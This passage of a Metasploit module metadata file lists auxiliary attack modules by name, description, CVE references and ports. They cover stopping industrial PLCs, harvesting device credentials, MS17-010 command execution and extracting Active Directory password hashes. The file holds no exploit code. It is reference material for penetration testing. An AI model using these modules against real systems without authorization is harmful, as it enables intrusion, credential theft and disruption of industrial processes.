WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.", + "references": [ + "CVE-2013-0653", + "OSVDB-89490", + "BID-57505", + "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb", + "is_install_path": true, + "ref_name": "admin/scada/ge_proficy_substitute_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/modicon_command": { + "name": "Schneider Modicon Remote START/STOP Command", + "fullname": "auxiliary/admin/scada/modicon_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-05", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/modicon_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/modicon_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/modicon_password_recovery": { + "name": "Schneider Modicon Quantum Password Recovery", + "fullname": "auxiliary/admin/scada/modicon_password_recovery", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-19", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2023-12-16 23:40:30 +0000", + "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb", + "is_install_path": true, + "ref_name": "admin/scada/modicon_password_recovery", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/modicon_stux_transfer": { + "name": "Schneider Modicon Ladder Logic Upload/Download", + "fullname": "auxiliary/admin/scada/modicon_stux_transfer", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-05", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb", + "is_install_path": true, + "ref_name": "admin/scada/modicon_stux_transfer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/moxa_credentials_recovery": { + "name": "Moxa Device Credential Retrieval", + "fullname": "auxiliary/admin/scada/moxa_credentials_recovery", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-07-28", + "type": "auxiliary", + "author": [ + "Patrick DeSantis ", + "K. Reid Wightman " + ], + "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.", + "references": [ + "CVE-2016-9361", + "BID-85965", + "URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/", + "URL-https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02" + ], + "platform": "", + "arch": "", + "rport": 4800, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb", + "is_install_path": true, + "ref_name": "admin/scada/moxa_credentials_recovery", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/multi_cip_command": { + "name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands", + "fullname": "auxiliary/admin/scada/multi_cip_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-19", + "type": "auxiliary", + "author": [ + "Ruben Santamarta ", + "K. Reid Wightman ", + "todb " + ], + "description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 44818, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/scada/multi_cip_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/multi_cip_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/mypro_mgr_creds": { + "name": "mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)", + "fullname": "auxiliary/admin/scada/mypro_mgr_creds", + "aliases": [], + "rank": 300, + "disclosure_date": "2025-02-13", + "type": "auxiliary", + "author": [ + "Michael Heinzl" + ], + "description": "Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.\n The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.", + "references": [ + "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16", + "CVE-2025-24865", + "CVE-2025-22896" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 34022, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-20 15:40:05 +0000", + "path": "/modules/auxiliary/admin/scada/mypro_mgr_creds.rb", + "is_install_path": true, + "ref_name": "admin/scada/mypro_mgr_creds", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/pcom_command": { + "name": "Unitronics PCOM remote START/STOP/RESET command", + "fullname": "auxiliary/admin/scada/pcom_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Luis Rosa " + ], + "description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.", + "references": [ + "URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf" + ], + "platform": "", + "arch": "", + "rport": 20256, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-01-29 16:19:13 +0000", + "path": "/modules/auxiliary/admin/scada/pcom_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/pcom_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/phoenix_command": { + "name": "PhoenixContact PLC Remote START/STOP Command", + "fullname": "auxiliary/admin/scada/phoenix_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-05-20", + "type": "auxiliary", + "author": [ + "Tijl Deneut " + ], + "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)", + "references": [ + "URL-https://github.com/tijldeneut/ICSSecurityScripts", + "CVE-2014-9195" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/phoenix_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/phoenix_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/yokogawa_bkbcopyd_client": { + "name": "Yokogawa BKBCopyD.exe Client", + "fullname": "auxiliary/admin/scada/yokogawa_bkbcopyd_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-08-09", + "type": "auxiliary", + "author": [ + "Unknown" + ], + "description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.", + "references": [ + "CVE-2014-5208", + "URL-https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access" + ], + "platform": "", + "arch": "", + "rport": 20111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-10 10:28:25 +0000", + "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb", + "is_install_path": true, + "ref_name": "admin/scada/yokogawa_bkbcopyd_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "PMODE", + "description": "Leak the current database" + }, + { + "name": "RETR", + "description": "Retrieve remote file" + }, + { + "name": "STOR", + "description": "Store remote file" + } + ] + }, + "auxiliary_admin/sccm/get_naa_credentials": { + "name": "Get NAA Credentials", + "fullname": "auxiliary/admin/sccm/get_naa_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "xpn", + "skelsec", + "smashery" + ], + "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n This requires a computer account, which can be added using the samr_account module.", + "references": [ + "URL-https://blog.xpnsec.com/unobfuscating-network-access-accounts/", + "URL-https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md", + "URL-https://github.com/Mayyhem/SharpSCCM", + "URL-https://github.com/garrettfoster13/sccmhunter" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-05-05 11:16:35 +0000", + "path": "/modules/auxiliary/admin/sccm/get_naa_credentials.rb", + "is_install_path": true, + "ref_name": "admin/sccm/get_naa_credentials", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/serverprotect/file": { + "name": "TrendMicro ServerProtect File Access", + "fullname": "auxiliary/admin/serverprotect/file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "toto" + ], + "description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.", + "references": [ + "CVE-2007-6507", + "OSVDB-44318", + "ZDI-07-077" + ], + "platform": "", + "arch": "", + "rport": 5168, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-05-12 22:15:21 +0000", + "path": "/modules/auxiliary/admin/serverprotect/file.rb", + "is_install_path": true, + "ref_name": "admin/serverprotect/file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "delete", + "description": "Delete a file" + }, + { + "name": "download", + "description": "Download a file" + }, + { + "name": "list", + "description": "List files (not recommended - will crash the driver)" + }, + { + "name": "upload", + "description": "Upload a file" + } + ] + }, + "auxiliary_admin/smb/change_password": { + "name": "SMB Password Change", + "fullname": "auxiliary/admin/smb/change_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "smashery" + ], + "description": "Change the password of an account using SMB. This provides several different\n APIs, each of which have their respective benefits and drawbacks.", + "references": [ + "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/change_password.rb", + "is_install_path": true, + "ref_name": "admin/smb/change_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "CHANGE", + "description": "Change the password, knowing the existing one. New AES kerberos keys will be generated." + }, + { + "name": "CHANGE_NTLM", + "description": "Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." + }, + { + "name": "RESET", + "description": "Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated." + }, + { + "name": "RESET_NTLM", + "description": "Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." + } + ] + }, + "auxiliary_admin/smb/check_dir_file": { + "name": "SMB Scanner Check File/Directory Utility", + "fullname": "auxiliary/admin/smb/check_dir_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "aushack ", + "j0hn__f" + ], + "description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus or known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/admin/smb/check_dir_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/check_dir_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/delete_file": { + "name": "SMB File Delete Utility", + "fullname": "auxiliary/admin/smb/delete_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "mubix " + ], + "description": "This module deletes a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/delete_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/delete_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/download_file": { + "name": "SMB File Download Utility", + "fullname": "auxiliary/admin/smb/download_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "mubix " + ], + "description": "This module downloads a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/download_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/download_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/list_directory": { + "name": "SMB Directory Listing Utility", + "fullname": "auxiliary/admin/smb/list_directory", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "mubix ", + "hdm " + ], + "description": "This module lists the directory of a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/admin/smb/list_directory.rb", + "is_install_path": true, + "ref_name": "admin/smb/list_directory", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/ms17_010_command": { + "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", + "fullname": "auxiliary/admin/smb/ms17_010_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-14", + "type": "auxiliary", + "author": [ + "sleepya", + "zerosum0x0", + "Shadow Brokers", + "Equation Group" + ], + "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0146", + "CVE-2017-0147", + "URL-https://github.com/worawit/MS17-010", + "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", + "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb", + "is_install_path": true, + "ref_name": "admin/smb/ms17_010_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ETERNALSYNERGY", + "ETERNALROMANCE", + "ETERNALCHAMPION", + "ETERNALBLUE" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/psexec_ntdsgrab": { + "name": "PsExec NTDS.dit And SYSTEM Hive Download Utility", + "fullname": "auxiliary/admin/smb/psexec_ntdsgrab", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Royce Davis " + ], + "description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.", + "references": [ + "URL-http://sourceforge.net/projects/smbexec", + "URL-https://www.optiv.com/blog/owning-computers-without-shell-access" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb", + "is_install_path": true, + "ref_name": "admin/smb/psexec_ntdsgrab", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/samba_symlink_traversal": { + "name": "Samba Symlink Directory Traversal", + "fullname": "auxiliary/admin/smb/samba_symlink_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "kcope", + "hdm " + ], + "description": "This module exploits a directory traversal flaw in the Samba\n CIFS server. To exploit this flaw, a writeable share must be specified.\n The newly created directory will link to the root filesystem.", + "references": [ + "CVE-2010-0926", + "OSVDB-62145", + "URL-http://www.samba.org/samba/news/symlink_attack.html" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb", + "is_install_path": true, + "ref_name": "admin/smb/samba_symlink_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/upload_file": { + "name": "SMB File Upload Utility", + "fullname": "auxiliary/admin/smb/upload_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module uploads a file to a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/upload_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/upload_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/webexec_command": { + "name": "WebEx Remote Command Execution Utility", + "fullname": "auxiliary/admin/smb/webexec_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ron Bowes " + ], + "description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.", + "references": [ + "URL-https://webexec.org", + "CVE-2018-15442" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2018-10-24 16:18:17 +0000", + "path": "/modules/auxiliary/admin/smb/webexec_command.rb", + "is_install_path": true, + "ref_name": "admin/smb/webexec_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/sunrpc/solaris_kcms_readfile": { + "name": "Solaris KCMS + TTDB Arbitrary File Read", + "fullname": "auxiliary/admin/sunrpc/solaris_kcms_readfile", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-01-22", + "type": "auxiliary", + "author": [ + "vlad902 ", + "jduck " + ], + "description": "This module targets a directory traversal vulnerability in the\n kcms_server component from the Kodak Color Management System. By\n utilizing the ToolTalk Database Server\\'s TT_ISBUILD procedure, an\n attacker can bypass existing directory traversal validation and\n read arbitrary files.\n\n Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both\n kcms_server and rpc.ttdbserverd must be running on the target\n host.", + "references": [ + "CVE-2003-0027", + "OSVDB-8201", + "BID-6665", + "URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2" + ], + "platform": "", + "arch": "", + "rport": 111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-10-05 13:50:30 +0000", + "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb", + "is_install_path": true, + "ref_name": "admin/sunrpc/solaris_kcms_readfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/teradata/teradata_odbc_sql": { + "name": "Teradata ODBC SQL Query Module", + "fullname": "auxiliary/admin/teradata/teradata_odbc_sql", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-29", + "type": "auxiliary", + "author": [ + "Ted Raffle (actuated)" + ], + "description": "SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.", + "references": [ + "URL-https://developer.teradata.com/tools/reference/teradata-python-module", + "URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux" + ], + "platform": "", + "arch": "", + "rport": 1025, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-05-17 17:04:49 +0000", + "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py", + "is_install_path": true, + "ref_name": "admin/teradata/teradata_odbc_sql", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "Teradata ODBC Authentication Scanner" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/tftp/tftp_transfer_util": { + "name": "TFTP File Transfer Utility", + "fullname": "auxiliary/admin/tftp/tftp_transfer_util", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module will transfer a file to or from a remote TFTP server.\n Note that the target must be able to connect back to the Metasploit system,\n and NAT traversal for TFTP is often unsupported.\n\n Two actions are supported: \"Upload\" and \"Download,\" which behave as one might\n expect -- use 'set action Actionname' to use either mode of operation.\n\n If \"Download\" is selected, at least one of FILENAME or REMOTE_FILENAME\n must be set. If \"Upload\" is selected, either FILENAME must be set to a valid path to\n a source file, or FILEDATA must be populated. FILENAME may be a fully qualified path,\n or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.", + "references": [ + "URL-http://www.faqs.org/rfcs/rfc1350.html", + "URL-http://www.networksorcery.com/enp/protocol/tftp.htm" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb", + "is_install_path": true, + "ref_name": "admin/tftp/tftp_transfer_util", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download REMOTE_FILENAME as FILENAME from the server." + }, + { + "name": "Upload", + "description": "Upload FILENAME as REMOTE_FILENAME to the server." + } + ] + }, + "auxiliary_admin/tikiwiki/tikidblib": { + "name": "TikiWiki Information Disclosure", + "fullname": "auxiliary/admin/tikiwiki/tikidblib", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-11-01", + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.", + "references": [ + "OSVDB-30172", + "BID-20858", + "CVE-2006-5702", + "URL-https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb", + "is_install_path": true, + "ref_name": "admin/tikiwiki/tikidblib", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Dump", + "description": "Dump user and password" + } + ] + }, + "auxiliary_admin/upnp/soap_portmapping": { + "name": "UPnP IGD SOAP Port Mapping Utility", + "fullname": "auxiliary/admin/upnp/soap_portmapping", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "St0rn ", + "Jon Hart " + ], + "description": "Manage port mappings on 